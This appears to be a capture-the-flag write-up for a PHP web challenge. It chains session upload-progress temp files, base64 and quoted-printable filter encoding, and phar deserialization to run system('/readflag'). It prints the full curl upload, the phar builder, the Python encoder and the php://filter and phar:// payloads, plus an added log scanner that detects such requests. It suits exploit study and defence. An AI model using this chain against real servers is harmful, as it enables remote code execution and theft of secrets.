step 1
Set up the container
The Dockerfile has a few problems; fix it by hand:
- FROM php:7.2-apache
- COPY ./flag /root
- COPY ./readflag /
- COPY ./html/ /var/www/html/
- COPY ./php.ini /usr/local/etc/php/php.ini
- COPY ./readflag /readsecret
- RUN chmod 755 /var/www/html && chown -R root:www-data /var/www/html && chmod 400 /root/flag && chmod 4111 /readflag
Modify php.ini:
- ; session.upload_progress.cleanup = On
- session.upload_progress.cleanup = Off
Without this change, the files in /tmp are deleted and can no longer be inspected.
step 2
- <?php
- $SECRET = `/readsecret`;
- include "waf.php";
- class User {
- public $role;
- function __construct($role) {
- $this->role = $role;
- }
- }
- class Admin{
- public $code;
- function __construct($code) {
- $this->code = $code;
- }
- function __destruct() {
- echo "Admin can play everything!";
- eval($this->code);
- }
- }
- function game($filename) {
- if (!empty($filename)) {
- if (waf($filename) && @copy($filename , "/tmp/tmp.tmp")) {
- echo "Well done!";
- } else {
- echo "Copy failed.";
- }
- } else {
- echo "User can play copy game.";
- }
- }
- function set_session(){
- global $SECRET;
- $data = serialize(new User("user"));
- $hmac = hash_hmac("sha256", $data, $SECRET);
- setcookie("session-data", sprintf("%s-----%s", $data, $hmac));
- }
- function check_session() {
- global $SECRET;
- $data = $_COOKIE["session-data"];
- list($data, $hmac) = explode("-----", $data, 2);
- if (!isset($data, $hmac) || !is_string($data) || !is_string($hmac) || !hash_equals(hash_hmac("sha256", $data, $SECRET), $hmac)) {
- die("hacker!");
- }
- $data = unserialize($data);
- if ( $data->role === "user" ){
- game($_GET["filename"]);
- }else if($data->role === "admin"){
- return new Admin($_GET['code']);
- }
- return 0;
- }
- if (!isset($_COOKIE["session-data"])) {
- set_session();
- highlight_file(__FILE__);
- }else{
- highlight_file(__FILE__);
- check_session();
- }
- User can play copy game.
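We can make use of the session temporary file. For background on these temporary files, see the following articles:
Guocheng Cup (国城杯) n0ob_un4er-wp - Litsasuk - cnblogs (博客园)
PHP: Session Upload Progress - Manual
A brief look at exploiting SESSION_UPLOAD_PROGRESS - Tencent Cloud Developer Community - Tencent Cloud
What the second field, file, contains does not matter here; any file will do.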
- curl http://127.0.0.1:1337/ -H 'Cookie: PHPSESSID=litsasuk' -F 'PHP_SESSION_UPLOAD_PROGRESS=[Your_data]' -F 'file=@/etc/passwd'
- root@07710596cbbe:/# cd ./tmp
- root@07710596cbbe:/tmp# ls
- sess_litsasuk
- root@07710596cbbe:/tmp# cat sess_litsasuk
- upload_progress_[Your_data]|a:5:{s:10:"start_time";i:1733990981;s:14:"content_length";i:3212;s:15:"bytes_processed";i:3212;s:4:"done";b:1;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:4:"file";s:4:"name";s:6:"passwd";s:8:"tmp_name";s:14:"/tmp/phpAPOEyx";s:5:"error";i:0;s:4:"done";b:1;s:10:"start_time";i:1733990981;s:15:"bytes_processed";i:2887;}}}
step 3
copy can trigger phar deserialization through a pseudo-protocol (stream wrapper).
- <?php
- highlight_file(__FILE__);
- class Admin{
- public $code;
- }
- @unlink('test.phar');
- $phar=new Phar('test.phar');
- $phar->startBuffering();
- $phar->setStub('<?php __HALT_COMPILER(); ?>');
- $o=new Admin();
- $o ->code="system('/readflag');";
- $phar->setMetadata($o);
- $phar->addFromString("test.txt","test");
- $phar->stopBuffering();
- ?>
step 4
Experiment
- <?php
- // File names
- $inputFile = 'test'; // input file name
- $outputFile = 'test'; // output file name
-
- // Open the input file through the base64-decode filter
- $inputHandle = fopen("php://filter/read=convert.base64-decode/resource=$inputFile", 'r');
- if (!$inputHandle) {
- die("无法打开输入文件: $inputFile");
- }
-
- // Read the decoded content
- $decodedContent = stream_get_contents($inputHandle);
- fclose($inputHandle);
-
- // Open the output file and write the decoded content
- $outputHandle = fopen($outputFile, 'w');
- if (!$outputHandle) {
- die("无法打开输出文件: $outputFile");
- }
-
- fwrite($outputHandle, $decodedContent);
- fclose($outputHandle);
-
- echo "文件解码并写回成功!";
- ?>
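How it works
Base64 encoding of the string "Man"
- Input data:
- The ASCII codes of the string "Man" are:
- M: 77 (01001101)
- a: 97 (01100001)
- n: 110 (01101110)
- Combine into binary data:
- 01001101 01100001 01101110
- Split into 6-bit blocks:
- After splitting we get:
- 010011 010110 000101 101110
- Convert to decimal:
- Map to the Base64 character set:
So the string "Man" Base64-encodes to "TWFu".
Base64 encoding of the string "Ma"
- Input data:
- The ASCII codes of the string "Ma" are:
- M: 77 (01001101)
- a: 97 (01100001)
- Pad to 3 bytes:
- After padding it becomes:
- 01001101 01100001 00000000
- Split into 6-bit blocks:
- After splitting we get:
- 010011 010110 000100 000000
- Convert to decimal:
- Map to the Base64 character set:
- Add the padding character:
- Because the original data is shorter than 3 bytes, we append one equals sign (=) at the end, indicating 1 byte of padding.
- The final result is:
TWE=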
Starting the experiment
The experiment shows that when PHP base64-decodes, it ignores anything outside the base64 alphabet. The base64 alphabet is:
- ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
upload_progress_ has only 14 valid characters, so
Experiment with file content captured from the Docker container:
- upload_progress_aad2lu|a:5:{s:10:"start_time";i:1733990981;s:14:"content_length";i:3212;s:15:"bytes_processed";i:3212;s:4:"done";b:1;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:4:"file";s:4:"name";s:6:"passwd";s:8:"tmp_name";s:14:"/tmp/phpAPOEyx";s:5:"error";i:0;s:4:"done";b:1;s:10:"start_time";i:1733990981;s:15:"bytes_processed";i:2887;}}}
decode->
- 簷hi趉?薏茪win
- k?宜Zb欒碉}O|滞xr夗z{ezx-?鲎k5寮瓃蔾∏鏱適v硣h濇醭椻曤?钔t~'v?奧v惟j?v?殭跈?沱fa??,l尻擘复硣h濇醭],氮矶)瀷^鬟遲魍l讝虻?畤睬潒o<
We can see win in it.
Now let's double-encode win:
- ZDJsdUNnPT0
- upload_progress_aaZDJsdUNnPT0|a:5:{s:10:"start_time";i:1733990981;s:14:"content_length";i:3212;s:15:"bytes_processed";i:3212;s:4:"done";b:1;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:4:"file";s:4:"name";s:6:"passwd";s:8:"tmp_name";s:14:"/tmp/phpAPOEyx";s:5:"error";i:0;s:4:"done";b:1;s:10:"start_time";i:1733990981;s:15:"bytes_processed";i:2887;}}}
- 簷hi趉?薏茪d2luCg==嫱t仓卅z-{?}舆5砠^炠^?a媫第蛓o+^矚鑡?y胤踋?y絣屮频婩怀]夐]潻灣団曤8潻灣猌蔡乘f蛒榠 髣?9z鸿?,嶷'y絣譑-j籱奼⒆谨鬏=骩5寮瓃蔾∏鏱巯;
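We can see d2lu in it, but there is a problem: there are no longer enough valid characters in front. With only two, the alignment is broken and the data can no longer be decoded correctly. We can try this instead:
Encode 222—d2lu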
- YWEtLS1kMmx1
- upload_progress_aaMjItLS1kMmx1=|a:5:{s:10:"start_time";i:1733990981;s:14:"content_length";i:3212;s:15:"bytes_processed";i:3212;s:4:"done";b:1;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:4:"file";s:4:"name";s:6:"passwd";s:8:"tmp_name";s:14:"/tmp/phpAPOEyx";s:5:"error";i:0;s:4:"done";b:1;s:10:"start_time";i:1733990981;s:15:"bytes_processed";i:2887;}}}
decode->
- 簷hi趉?薏茪22---d2luk?宜Zb欒碉}O|滞xr夗z{ezx-?鲎k5寮瓃蔾∏鏱適v硣h濇醭椻曤?钔t~'v?奧v惟j?v?殭跈?沱fa??,l尻擘复硣h濇醭],氮矶)瀷^鬟遲魍l讝虻?畤睬潒o<
That failed, so let's try another approach.
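The alignment effect seen in the experiments above, as an added example (not code from the original post): a small Python model of a decoder that skips bytes outside the base64 alphabet. The names lenient_b64decode and filler_needed are hypothetical, the sample is constructed from the session-file layout shown above, and the real PHP filter's handling of = is not modelled.

```python
import base64

B64_ALPHABET = set(
    b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
)

def valid_chars(data: bytes) -> bytes:
    """Keep only bytes from the base64 alphabet, dropping everything else."""
    return bytes(b for b in data if b in B64_ALPHABET)

def lenient_b64decode(data: bytes) -> bytes:
    """Model of a decoder that silently skips non-alphabet bytes.

    Assumption: '=' is dropped like any other non-alphabet byte; the
    padding rules of the real PHP filter are not modelled here.
    """
    kept = valid_chars(data)
    rem = len(kept) % 4
    if rem == 1:                 # one leftover character holds no full byte
        kept = kept[:-1]
    elif rem:                    # 2 or 3 leftovers: pad for the stdlib decoder
        kept += b"=" * (4 - rem)
    return base64.b64decode(kept)

def filler_needed(prefix: bytes) -> int:
    """Valid characters needed after `prefix` to reach a 4-character boundary."""
    return (-len(valid_chars(prefix))) % 4

# Constructed sample shaped like the session file shown on the page.
TAIL = b'|a:5:{s:10:"start_time";i:1733990981;}'
ALIGNED = b"upload_progress_" + b"aa" + b"d2lu" + TAIL     # 14 + 2 valid chars
MISALIGNED = b"upload_progress_" + b"a" + b"d2lu" + TAIL   # 14 + 1 valid chars

if __name__ == "__main__":
    print("filler needed:", filler_needed(b"upload_progress_"))
    print("aligned   :", lenient_b64decode(ALIGNED)[12:15])
    print("misaligned:", b"win" in lenient_b64decode(MISALIGNED))
```

The underscores in the prefix are not in the alphabet, which is why only 14 of its 16 characters count toward the 4-character groups.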
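Quoted-Printable is a way of encoding data that is widely used, especially in e-mail transport (the MIME standard). Its main purpose is to keep data consistent as it travels between different systems and to avoid corruption caused by encoding problems.
Characteristics:
- Readability: most printable ASCII characters are unchanged by the encoding, so a person can read the encoded content to some extent.
- Safety: non-ASCII characters and special characters are encoded as =XX, where XX is the character's hexadecimal ASCII code.
- Line-break handling: long lines are split, with = at the end of a line marking a continuation.
Quoted-Printable decoding
Quoted-Printable decoding converts Quoted-Printable encoded data back to its original readable form. The process consists of:
- Recognizing escape sequences: look for sequences that start with =; they stand for specific characters. For example, =3D stands for the = character and =0A stands for a line feed.
- Converting characters: turn these escape sequences back into the original characters they represent.
- Handling line breaks: remove the = at the end of a line and join the split lines.
The ciphertext this encoding produces always has a length that is a multiple of 3, which guarantees alignment. We use the payload from the writeup directly to study the principle.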
- <?php
-
- // Assume this is the final Base64-encoded string produced by the encoding steps
- $encoded_string = file_get_contents('./test.txt');
-
- // Step 1: Base64 decode (three rounds)
- $base64_decoded = base64_decode($encoded_string);
- $base64_decoded = base64_decode($base64_decoded);
- $base64_decoded = base64_decode($base64_decoded);
- echo "Step 1 - Base64 Decode:\n";
- echo $base64_decoded . "\n";
-
- // Step 2: Quoted-Printable decode
- $quoted_printable_decoded = quoted_printable_decode($base64_decoded);
- echo "Step 2 - Quoted-Printable Decode:\n";
- echo $quoted_printable_decoded . "\n";
-
- // Step 4: Base64 decode (again)
- $final_decoded = base64_decode($quoted_printable_decoded);
- echo "Step 4 - Final Base64 Decode:\n";
- echo $final_decoded . "\n";
- ?>
Python script that encodes test.phar into the =XX=00 form:
- import base64
- # Read the file contents
- with open('test.phar', 'rb') as file:
-     file_content = file.read()
- # Step 1: Base64-encode the file contents
- base64_encoded = base64.b64encode(file_content).decode('utf-8')
- # Step 2: convert the Base64-encoded content into the required format
- encoded_str = ''.join(['=' + hex(ord(char))[2:] + '=00' for char in base64_encoded]).upper()
- # Print the result
- print(encoded_str)
- upload_progress_ZZ[Your_data]|a:5:{s:10:"start_time";i:1733990981;s:14:"content_length";i:3212;s:15:"bytes_processed";i:3212;s:4:"done";b:1;s:5:"files";a:1:{i:0;a:7:{s:10:"field_name";s:4:"file";s:4:"name";s:6:"passwd";s:8:"tmp_name";s:14:"/tmp/phpAPOEyx";s:5:"error";i:0;s:4:"done";b:1;s:10:"start_time";i:1733990981;s:15:"bytes_processed";i:2887;}}}
Note: you must pad with A (which decodes to 0) so that no = is present after any of the encoding rounds.
- Step 1 - Base64 Decode: =50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=70=00=74=00=41=00=41=00=41=00=41=00=41=00=51=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=33=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=31=00=4F=00=69=00=4A=00=42=00=5A=00=47=00=31=00=70=00=62=00=69=00=49=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=30=00=4F=00=69=00=4A=00=6A=00=62=00=32=00=52=00=6C=00=49=00=6A=00=74=00=7A=00=4F=00=6A=00=49=00=77=00=4F=00=69=00=4A=00=7A=00=65=00=58=00=4E=00=30=00=5A=00=57=00=30=00=6F=00=4A=00=79=00=39=00=79=00=5A=00=57=00=46=00=6B=00=5A=00=6D=00=78=00=68=00=5A=00=79=00=63=00=70=00=4F=00=79=00=49=00=37=00=66=00=51=00=67=00=41=00=41=00=41=00=42=00=30=00=5A=00=58=00=4E=00=30=00=4C=00=6E=00=52=00=34=00=64=00=41=00=51=00=41=00=41=00=41=00=44=00=64=00=58=00=42=00=74=00=6E=00=42=00=41=00=41=00=41=00=41=00=41=00=78=00=2B=00=66=00=39=00=69=00=32=00=41=00=51=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=48=00=52=00=6C=00=63=00=33=00=52=00=4A=00=52=00=4F=00=30=00=76=00=59=00=75=00=4B=00=35=00=35=00=4A=00=33=00=5A=00=72=00=2B=00=48=00=70=00=34=00=37=00=46=00=4B=00=68=00=6F=00=54=00=66=00=47=00=77=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00AAAAAAAAAAAAw? Step 2 - Quoted-Printable Decode: PD9waHAgX19IQUxUX0NPTVBJTEVSKCk7ID8+DQptAAAAAQAAABEAAAABAAAAAAA3AAAATzo1OiJBZG1pbiI6MTp7czo0OiJjb2RlIjtzOjIwOiJzeXN0ZW0oJy9yZWFkZmxhZycpOyI7fQgAAAB0ZXN0LnR4dAQAAADdXBtnBAAAAAx+f9i2AQAAAAAAAHRlc3RJRO0vYuK55J3Zr+Hp47FKhoTfGwIAAABHQk1CAAAAAAAAAAAAw? Step 4 - Final Base64 Decode: m7O:5:"Admin":1:{s:4:"code";s:20:"system('/readflag');";}test.txt?g~?testID?/b??????J???GBMB
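Padding with FF instead of ZZ also works. What matters is whether the number of valid characters it turns into after decoding keeps the alignment (try decoding it yourself!).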
step 5
1. Have copy read the data from the temporary file into /tmp/tmp.tmp
- ?filename=php://filter/read=convert.base64-decode|convert.base64-decode|convert.base64-decode|convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=filename
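This is not the only way to exploit it; there may be simpler ones.
String Filters
Conversion Filters
2. Decode the file from tmp and parse the test.txt file inside the phar to trigger deserialization and execute the command (if PHP's default cleanup has not been turned off, a race condition is required)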
- phar:///tmp/tmp.tmp/test.txt
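A detection-side view of the two requests in step 5, as an added example (not part of the original write-up): it scans access-log lines for query parameters whose value begins with a php:// or phar:// wrapper and counts the chained filters. The log lines are constructed, and the function names and log layout are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote

WRAPPER_RE = re.compile(r"^\s*(php|phar)://", re.I)
FILTER_RE = re.compile(r"(?:convert|string)\.[a-z0-9.\-]+", re.I)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_unquote(value, rounds=3):
    """Undo repeated percent-encoding so nested encoding cannot hide a wrapper."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_request(line):
    """Return one finding per query parameter that starts with php:// or phar://."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    query = m.group(1).partition("?")[2]
    findings = []
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value = fully_unquote(raw)
        wrapper = WRAPPER_RE.match(value)
        if wrapper:
            scheme = wrapper.group(1).lower()
            chain = FILTER_RE.findall(value) if scheme == "php" else []
            findings.append({"param": name, "wrapper": scheme, "filters": len(chain)})
    return findings

# Constructed access-log lines; the first two reuse the step 5 request values.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Dec/2024:08:10:01 +0000] "GET /?filename=php://filter/'
    'read=convert.base64-decode|convert.base64-decode|convert.base64-decode|'
    'convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|'
    'convert.base64-decode/resource=filename HTTP/1.1" 200 512',
    '203.0.113.7 - - [12/Dec/2024:08:10:02 +0000] '
    '"GET /?filename=phar%3A%2F%2F%2Ftmp%2Ftmp.tmp%2Ftest.txt HTTP/1.1" 200 512',
    '198.51.100.4 - - [12/Dec/2024:08:11:30 +0000] '
    '"GET /?filename=/var/www/html/index.php HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(inspect_request(entry))
```

A parameter that names any stream wrapper is already unusual for a file-copy feature; a long filter chain followed by a phar:// request against the same target path is the pattern this page describes.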
end – 24-12-12